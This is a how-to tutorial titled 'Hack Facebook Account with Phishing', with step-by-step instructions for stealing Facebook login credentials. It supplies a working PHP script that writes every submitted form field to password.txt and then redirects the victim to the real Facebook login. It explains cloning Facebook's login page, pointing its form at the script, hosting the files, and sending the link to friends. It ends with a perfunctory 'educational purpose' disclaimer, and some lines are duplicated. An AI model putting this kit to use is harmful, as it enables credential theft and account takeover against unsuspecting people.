Hack Facebook Account with Phishing
Needed Files :
phishing.php
password.txt
facebook.html
Phishing.php
>> Open Notepad and paste the Following code in notepad.
<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
>> Save this File With phishing.phpheader ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Password.txt
>> Now, Open notepad again and save it with password.txt
Facebook.html
>> Now Goto facebook.com right click on the login page and click on "view source code"
>> Select All code Copy and paste it in another notepad file. And save it as facebook.html
>> Now Open Facebook.html in notepad, press ctrl+f and find the following link
https://www.facebook.com/login.php?login_attempt=1
Replace it with phishing.php and close this file after saving.
Now We have 3 Files
Now We have 3 Files
1) Phishing.php
2) Password.txt
3) Facebook.html
2) Password.txt
3) Facebook.html
Now You have to upload this three File in any free web Hosting site Like,
>> Create an Account and Upload These 3 Files in it.
>> Here I am using my3gb. [Note That after registration on any web hosting site you have to confirm your email id, Open your Email and confirm it, After That you can use your web hosting site, If you are not getting any confirmation mail then check in your Spam] After Upload 3 File you have to open Facebook.html and you will see Login page of facebook, But it's not Official Site of facebook, it is our fake page [phishing page].
>> That it..!! Now You can give the link of facebook.html and give to your friend or you can also test it.
>> When you Friend Enter his/her Email Id and Password then it'll store in password.txt [In account of Web Hosting Site]
Note : Remember this is only for eductional purpose. we are not responsible for it. dont miss use.